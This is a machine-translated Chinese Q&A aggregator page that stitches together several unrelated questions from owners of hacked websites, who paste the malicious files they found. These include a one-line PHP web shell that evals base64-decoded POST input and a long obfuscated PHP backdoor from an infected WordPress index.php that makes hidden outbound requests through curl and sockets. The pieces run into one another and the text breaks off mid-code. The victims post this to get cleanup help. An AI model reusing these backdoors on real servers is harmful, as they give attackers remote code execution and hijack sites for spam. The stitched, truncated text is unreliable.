我的托管服务提供商最近暂停了我的网站,因为它上面发送了大量垃圾邮件.最初我和提供商认为这是由于几天前我在服务器上放置的电子邮件活动的不安全形式.我从服务器上删除了带有表单的页面,但服务器仍在发送垃圾邮件.
我在服务器根目录的"css"文件夹中找到了一个名为7c32.php的php文件.我绝对没有成功.这是文件中的代码:
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>
Run Code Online (Sandbox Code Playgroud)
通过在线解码器运行后,这就是它的结果:
if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));
Run Code Online (Sandbox Code Playgroud)
我做了一些关于恶意php文件的阅读,并看到了eval(和base64_decode字符串非常可疑.我浏览了服务器日志文件,看到了几个来自沙特阿拉伯的ip地址的7c32.php文件的帖子查询.
我删除了php文件,更新了所有过时的wordpress主题和插件(以及自己的平台,并将密码更改为FTP服务器和Wordpress管理帐户更安全的东西.
我还能做些什么来确保我的服务器安全吗?我即将去搜索这些base64和eval(服务器上每个其他php文件中的字符串,但除此之外,我没有想法.
这个PHP脚本似乎太短了不能造成任何损害,但还有什么可以发送所有垃圾邮件?
任何帮助将不胜感激.
我一进入网站,我的浏览器(chrome)就下载了这个脚本.它没有混淆,也没有太久,我认为它是无害的,但我不知道PHP,所以我不确定.该文件被调用csync.php.
Chrome使它看起来像是唯一下载的文件.有可能这不是真的吗?
有人能说清楚这是做什么的吗?
<?php
require_once("config/config.php");
require_function("util/StaticFunctions.php");
require_function("service/ServiceFactory.php");
require_function("bo/BoFactory.php");
require_function("data/DataFactory.php");
require_function("util/UtilFactory.php");
require_function("data/AkamaiLoggingService.php");
include 'config/setup/config-setup-skenzo.php';
include 'config/skenzo_request_variables.php';
header('P3P:CP="NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA"');
header('Content-type: text/html');
header('Cache-Control: no-cache, no-store, must-revalidate');
header('Pragma: no-cache');
header('Expires: -1');
$visitorInfo = BoFactory::getVisitorInfo();
$vsid = $visitorInfo->getVisitorId();
$dataNames = VisitorInfo::$VSID_DATA_NAMES;
$mName = BoFactory::getInboundHttpRequest()->getSanitizedValueOfParam('type');
$mValue = BoFactory::getInboundHttpRequest()->getSanitizedValueOfParam('ovsid');
$vsCk = VISITOR_ID;
$vsDaCk = VISITOR_DATA;
$sepVal = VisitorInfo::$VALUE_SEP;
$sepTime = VisitorInfo::$TIME_SEP;
$vsDaTime = VisitorInfo::$VSID_DATA_TIME;
echo '<html> <head></head> <body> …Run Code Online (Sandbox Code Playgroud) 我的Wordpress网站被黑了.它将用户重定向到某个垃圾邮件网站.因为我已经清理了网站,问题不再发生了.
问题是,我的访问者仍然被重定向到垃圾邮件网站,直到他们清理缓存或停止重定向并重新加载页面.
我不太确定该怎么做,要解决这个问题.我知道我无法远程删除用户的缓存,但必须有一些方法告诉他们的浏览器,在重定向开始之前网站上有更改.
我已将此代码添加到网站:
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
Run Code Online (Sandbox Code Playgroud)
有任何想法吗?
有没有办法防止或使其难以让某人注入Javascript并操纵变量或访问函数?我的想法是在每次重新加载时随机更改所有var名称,以便每次都需要重写恶意软件脚本?还是有其他不那么痛苦的方法?
我知道最终有人会破解他的方式,但我想知道如何使重现行动变得困难,以便人们不会发布书签或类似的东西供所有人使用.我不在乎专家是否在代码中找到了自己的方式,但我希望它比它复杂一点javascript:d=0;
如果你知道如何使黑客攻击Javascript更困难,请写下这些.
我想要恶意软件感染网站列表(只有URL)的任何指针?
找到一些,但他们没有下载列表的选项.
一些网站是:http: //malc0de.com/database/
http://www.malwareblacklist.com/showMDL.php
无法从这些列表中复制每个URL.
任何指向这些的指标都表示赞赏.
我必须修复感染恶意软件的网站。当我尝试访问 WP Admin 时,它显示“到许多重定向”。
托管公司进行了扫描,发现有很多受感染的文件。我设法删除了 public_html 文件夹中除 index.php 之外的所有内容。index.php 里面的代码是:
<?php
$O0_O00_OO_='xaoH6Rs0zcxDeo5viLrz8MgweN9D5k9tmY225gw0sLaX9Yk0aLkm3dop7Z2XnJjxjdeWyV7lib1ik5sjmbh2c01=';
$O0OOO0_0__=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$OO_O_0O_00=$O0OOO0_0__{16}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{27}.$O0OOO0_0__{29}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{16}.$O0OOO0_0__{23}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{6}.$O0OOO0_0__{23}.$O0OOO0_0__{23}.$O0OOO0_0__{3}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{25};$OO0OO__00_=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{23}.$O0OOO0_0__{12}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10};$O0_O__0OO0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{6}.$O0OOO0_0__{29}.$O0OOO0_0__{26}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{6};$O_O_00OO_0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{23}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{12}.$O0OOO0_0__{0}.$O0OOO0_0__{27};$OO_000O__O=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{18}.$O0OOO0_0__{10};$O0O__O0_O0=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{16}.$O0OOO0_0__{18}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O_OO_000_O=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O00_O__O0O=$O0OOO0_0__{31}.$O0OOO0_0__{10}.$O0OOO0_0__{10}.$O0OOO0_0__{16}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{18}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{26}.$O0OOO0_0__{29}.$O0OOO0_0__{19}.$O0OOO0_0__{18}.$O0OOO0_0__{30}.$O0OOO0_0__{24}.$O0OOO0_0__{20};$O0OO0_0_O_=$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{29}.$O0OOO0_0__{30}.$O0OOO0_0__{17}.$O0OOO0_0__{12}.$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$OO_0O_O_00=$O0OOO0_0__{32}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0};$O00O0___OO=$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{0}.$O0OOO0_0__{30}.$O0OOO0_0__{32}.$O0OOO0_0__{10};$OO00_O0__O=$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{
///SOME CODE IS MISSING BECAUSE OF 30K LIMIT
0OOO0_0__{26};$OO000O__O_=$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{12}.$O0OOO0_0__{5};$OOO0_0O0__=$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30};$O_0OO0_O0_=$O0OOO0_0__{41}.$O0OOO0_0__{35}.$O0OOO0_0__{12}.$O0OOO0_0__{0};$O0_OOO00__=$O0OOO0_0__{38}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{38};$OOO_000O__=$O0OOO0_0__{5}.$O0OOO0_0__{26}.$O0OOO0_0__{7};if(!function_exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$O_0__O0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$url,$OO0OO0_0__=0,$O_0_00_OOO=1,$O_0OO0O__0=NULL,$OO0_O0O__0=array(),$O_O0O0__0O=\'shell\'','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x4f\x5f\x30\x30"]("/^https*\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$O_OO00O0__.=$url;echo $O_OO00O0__;unset($O_OO00O0__);exit();}return \'\';}$OO0_0_0O_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$OO_00OO_0_=$O_O__00O0O=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'|\',$OO0_0_0O_O) as $c){$OO00OO___0=1;if($OO0OO0_0__&&substr($c,0,1)==\'c\'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]($d)){$OO00OO___0=0;}}unset($d);if($OO00OO___0){$OO_00OO_0_=$c;break;}}unset($OO0_0_0O_O,$c);if($OO_00OO_0_==\'\'){return 0;}if(substr($OO_00OO_0_,0,1)==\'c\'){$O0O___0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x30\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_USERAGENT,$O_O0O0__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_FRESH_CONNECT,TRUE);if($O_0_00_OOO==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0));}}$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f\x5f"]($O0O___0OO0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x4f\x30\x4f\x5f\x5f"]($O0O___0OO0);if(!$O_0O__O00O){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'i04uLhTcpRSC0qyi+KVctLKi6tPwBgA=\');$O_OO00O0__.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30"]($O0O___0OO0);echo $O_OO00O0__;unset($O_OO00O0__);exit();}return 0;}else{$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_0O__O00O,"\\xEF\\xBB\\xBF"));return $O_0O__O00O;}}$O0_O_0_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x30\x4f\x5f\x4f"]($url);isset($O0_O_0_O0O["\x68\x6f\x73\x74"])||$O0_O_0_O0O["\x68\x6f\x73\x74"]=\'\';isset($O0_O_0_O0O["\x70\x61\x74\x68"])||$O0_O_0_O0O["\x70\x61\x74\x68"]=\'\';isset($O0_O_0_O0O["\x71\x75\x65\x72\x79"])|| $O0_O_0_O0O["\x71\x75\x65\x72\x79"]=\'\';isset($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])||$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"]=\'\';$O__OOO00_0=$O0_O_0_O0O["\x70\x61\x74\x68"]?$O0_O_0_O0O["\x70\x61\x74\x68"].($O0_O_0_O0O["\x71\x75\x65\x72\x79"]?\'?\'.$O0_O_0_O0O["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$OOO00O0___=$O0_O_0_O0O["\x68\x6f\x73\x74"];if($O0_O_0_O0O["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O00_OO__0O=\'1.1\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?443:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];$OOO00O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Ky7OshTdLtPXBwA=\');$OOO00O0___.=$O0_O_0_O0O["\x68\x6f\x73\x74"];}else{$O00_OO__0O=\'1.0\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?80:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];}$O0OO_0O0__=\'Host:\';$O0OO_0O0__.=$OOO00O0___;$OO0_O0O__0[]=$O0OO_0O0__;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Cy1OLhTdJ1TE/NK7EtPCAA==\').$O_O0O0__0O;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c0xOThTi0osdLtPS1wIA\');unset($O0OO_0O0__);if($O_0_00_OOO==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){$O_0OO0O__0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0);}$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9tPJTQEA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9H1Sc1LL8mtPwAgA=\').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_0OO0O__0);$O_O__00O0O="POST $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n".$O_0OO0O__0;unset($O_0OO0O__0);}else{$O_O__00O0O="GET $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n";}unset($OO0_O0O__0,$O0_O_0_O0O,$O00_OO__0O,$O__OOO00_0);$O_O0O__0O0=null;if(substr($OO_00OO_0_,-1)==\'n\'){$O_O0O__0O0=$OO_00OO_0_($OOO00O0___,$O0O0__O_0O,$O_OO00O0__no,$O_OO00O0__str,30);}else{if(substr($OO_00OO_0_,-1)==\'t\'){$O_O__O0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'K0kushTNLtPXBwA=\');$O_O__O0O00.=$OOO00O0___;$O_O__O0O00.=\':\';$O_O__O0O00.=$O0O0__O_0O;$O_O0O__0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x5f\x5f\x30\x30\x5f"]($O_O__O0O00,$O_OO00O0__no,$O_OO00O0__str,30);unset($O_O__O0O00);}}$O_OO00__0O=\'\';if($O_O0O__0O0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x4f\x4f\x5f\x30"]($O_O0O__0O0,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f"]($O_O0O__0O0,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O0O__0O0,$O_O__00O0O);if(!$OO0OO0_0__){$O_0_O00_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x5f\x30\x4f\x4f\x30"]($O_O0O__0O0);if(!$O_0_O00_OO["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_0O0OO_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x30\x4f\x4f\x4f\x5f\x5f"]($O_O0O__0O0);if($O_0O0OO_0_&&($O_0O0OO_0_=="\\r\\n"||$O_0O0OO_0_=="\\n")){break;}unset($O_0O0OO_0_);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x4f\x5f\x5f\x30\x4f\x5f"]($O_O0O__0O0,8192);$O_OO00__0O.=$O_O_0O00_O;unset($O_O_0O00_O);}}unset($O_0_O00_OO);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x4f\x4f\x30\x5f"]($O_O0O__0O0);}else{if(substr($OO_00OO_0_,-1)==\'e\'){$O0O_0O0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f"]($OOO00O0___);$O_O0O__0O0=$OO_00OO_0_(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x5f\x5f\x4f\x4f"]($O_O0O__0O0,$O0O_0O0_O_,$O0O0__O_0O)){if(!$OO0OO0_0__){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));while($O0O0O0O___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f"]($O_O0O__0O0,8192)){$O_OO00__0O.=$O0O0O0O___;unset($O0O0O0O___);}$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x4f\x4f\x30\x4f\x30"]($O_OO00__0O);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x4f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);}else{$O_O_00_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](2,5);$O_00OO0O__=0;while($O_00OO0O__<$O_O_00_O0O){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));$O_00OO0O__++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x5f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](50000,100000));}unset($O_00OO0O__,$O_O_00_O0O);}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f\x5f"]($O_O0O__0O0);unset($O0O_0O0_O_);}}unset($O_O__00O0O,$OO_00OO_0_,$O_O0O__0O0,$O0O0__O_0O,$OOO00O0___);if(!$OO0OO0_0__){$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x30"](\'/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)\'.\'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"](\'$matches\',\'return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x5f\x5f\x4f\x4f\x4f"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($matches[2])?$matches[2]:$matches[0];\'),$O_OO00__0O);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_OO00__0O,"\\xEF\\xBB\\xBF"));}else{return 1;}');$OOO__000_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$O_O_0OO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x30\x4f\x30\x5f\x5f"]($OOO0__0O_0));$OO__O0O_00=substr($O_O_0OO0_0,0,5);$OOO_00__0O=substr($O_O_0OO0_0,-5);$OO__0O0_O0=substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10);return $OO__O0O_00.\'hT\'.substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10).\'tP\'.$OOO_00__0O;');$O0_0_OO0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$OO__O0O_00=substr($OOO0__0O_0,0,5);$OOO_00__0O=substr($OOO0__0O_0,-5);$OO__0O0_O0=substr($OOO0__0O_0,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($OOO0__0O_0)-14);return 